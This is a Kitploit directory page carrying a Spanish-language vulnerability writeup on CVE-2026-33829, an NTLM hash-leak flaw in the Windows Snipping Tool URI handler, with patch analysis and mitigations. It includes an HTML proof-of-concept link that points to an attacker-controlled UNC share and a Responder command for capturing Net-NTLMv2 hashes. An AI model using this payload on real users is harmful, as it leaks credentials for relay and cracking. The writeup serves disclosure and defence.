Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33829-Writeup — Estudio de caso de vulnerabilidad: CVE-2026-33829 (Windows Snipping Tool NTLM Coercion) | Kitploit
Herramientas/GitHubGitHub/rahultb-sec/cve-2026-33829-writeup
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónPhishingAprendizaje y Educación
GitHubrahultb-sec/cve-2026-33829-writeup

CVE-2026-33829-Writeup

Estudio de caso de vulnerabilidad: CVE-2026-33829 (Windows Snipping Tool NTLM Coercion)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 3 mesesAún no revisado

CVE-2026-33829-Writeup

Estudio de caso de vulnerabilidad: CVE-2026-33829 (Coerción NTLM en la Herramienta Recortes de Windows)

Resumen ejecutivo

Este informe detalla la reproducción técnica de CVE-2026-33829, una vulnerabilidad de divulgación de información en el marco de la moderna aplicación Herramienta Recortes de Windows. Al abusar de un parámetro de entrada no validado en un manejador de protocolo URI personalizado, un host remoto puede coaccionar a una máquina Windows sin parchear para que inicie una conexión SMB saliente, lo que resulta en la filtración de hashes de autenticación Net-NTLMv2 a través de la red.

Esquema URI: (Windows utiliza protocolos personalizados (como ms-screensketch:, ms-settings: , file:) para permitir que los navegadores web se comuniquen con aplicaciones de escritorio).

Análisis de la causa raíz

La causa raíz de esta vulnerabilidad reside en el esquema URI (ms-screensketch:edit). Cuando una víctima hace clic en un enlace malicioso que contiene (ms-screensketch:edit?&filePath=\\ATTACKER_IP\\share\evil.png) y aprueba la opción "Abrir Herramienta Recortes", el sistema operativo invoca SnippingTool.exe y pasa el parámetro filePath malicioso, como (ms-screensketch:edit?filePath=\\ATTACKER-IP\\share\evil.png), sin una validación adecuada.

Debido a que hay un parámetro :edit?, la herramienta de recortes intenta editar el archivo desde la ruta proporcionada (filePath=\\ATTACKER-IP\\share\evil.png). Esto da como resultado el inicio de una conexión a través de la red mediante el Bloque de mensajes del servidor (SMB). Debido a que SMB está diseñado para verificar quién solicita el archivo, Windows automáticamente intenta autenticar al usuario. Envía el hash de desafío-respuesta Net-NTLMv2 del usuario actualmente conectado al servidor del atacante. Todo el proceso ocurre silenciosamente en segundo plano, sin ninguna advertencia visible ni aviso al usuario.

El atacante captura los datos de autenticación de desafío-respuesta Net-NTLMv2 de la víctima. Una vez que un atacante posee el hash Net-NTLM de la víctima, puede realizar un ataque de retransmisión NTLM (NTLM relay) para hacerse pasar por la víctima y acceder a recursos de la red interna o autenticarse en otros servicios de la empresa, o tomar el hash capturado fuera de línea y usar ataques de fuerza bruta o diccionario para descubrir la contraseña real de Windows en texto plano de la víctima.

Prueba de concepto

Para activar el manejador, se implementó una carga útil HTML simple para simular un vector de phishing o compromiso de intranet.

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
  <button onclick="window.location.href='ms-screensketch:edit?&filePath=\\ATTACKER-IP\share\test.png&isTemporary=false&saved=true&source=Toast'">Launch Verification</button>
</body>
</html>
3

Para capturar el hash, se implementó una instancia aislada de Kali Linux ejecutando Responder.

sudo responder -I eth0 -v

1

Al hacer clic en el botón dentro del entorno Windows de destino, la aplicación abrió el contexto de edición y enrutó instantáneamente una solicitud SMB al host de escucha. La secuencia de desafío-respuesta de autenticación se completó sin problemas, capturando la estructura del hash Net-NTLMv2 para el contexto del usuario objetivo.

2 Captura de pantalla (103) El paquete NTLMSSP_NEGOTIATE muestra que el sistema de la víctima inicia la autenticación NTLM durante la configuración de la sesión SMB después de resolver la ruta UNC controlada por el atacante. Captura de pantalla (104)

El paquete NTLMSSP_AUTH contiene los datos de autenticación de desafío-respuesta Net-NTLMv2 transmitidos por el sistema de la víctima después de completarse la fase de desafío.

De ahí, el atacante captura el hash NTLMv2 transmitido.

4

Los datos de desafío-respuesta Net-NTLMv2 capturados pueden aprovecharse en ataques de retransmisión NTLM o someterse a intentos de descifrado de contraseñas fuera de línea, dependiendo del entorno de destino.

Remediación

¿Cómo parcheó Windows esto?

Antes del parche, la función de edición de la Herramienta Recortes tomaba la cadena dentro de filePath y la pasaba directamente a las API de apertura de archivos.

El comportamiento observado tras el parche sugiere que Microsoft introdujo lógica de validación que impide que los valores filePath basados en UNC/red lleguen a las API subyacentes de manejo de archivos. Ahora, cuando se pasa una cadena a filePath, la aplicación realiza una verificación de cordura antes de entregarla al sistema operativo:

Comprueba si la cadena comienza con marcadores de unidad local (como C:\ o D:) o variables estándar seguras del sistema local.

Si la aplicación detecta un prefijo de Convención de nomenclatura universal (UNC) (como \ o \\), o un patrón de IP de red externa, el bucle de validación lo marca como un argumento ilegal, lanza una excepción y termina el proceso de carga de archivos inmediatamente.

Debido a que el código se detiene antes de ejecutar las instrucciones Win32 de apertura de archivos, el núcleo de Windows nunca recibe la solicitud y no se envía ningún paquete SMB.

Si intentamos nuevamente después de aplicar la actualización de seguridad, la aplicación seguía invocando el manejador ms-screensketch:, pero los valores filePath remotos ya no se resolvían a través del flujo de trabajo de edición.

Asegúrese de que todos los endpoints Windows estén actualizados más allá de la línea base del parche de seguridad del 14 de abril de 2026, que introduce límites estrictos de validación de entrada al manejador de la aplicación.

Aplique reglas estrictas de firewall de salida que bloqueen el tráfico TCP saliente del puerto 445 hacia redes externas no autorizadas, mitigando el riesgo de fuga de credenciales.

Configure Objetivos de directiva de grupo (GPOs) para restringir el tráfico NTLM saliente a servidores remotos, forzando protocolos alternativos seguros como Kerberos cuando corresponda.

El análisis posterior de CVE-2026-33829 demuestra cómo los flujos de trabajo confiables de aplicaciones y los comportamientos de autenticación heredados pueden exponer involuntariamente material de credenciales a través de interacciones de red salientes. Si bien la vulnerabilidad no proporciona ejecución directa de código, refuerza la importancia de restringir la autenticación NTLM innecesaria, monitorear el tráfico SMB saliente y validar el manejo de recursos impulsado por URI en entornos Windows.

root@kitploit:~
         Aviso legal: Este informe se compila estrictamente con fines educativos, de investigación defensiva y validación en laboratorio. Todas las pruebas se realizaron dentro de un entorno sandbox totalmente aislado.
Descargar herramienta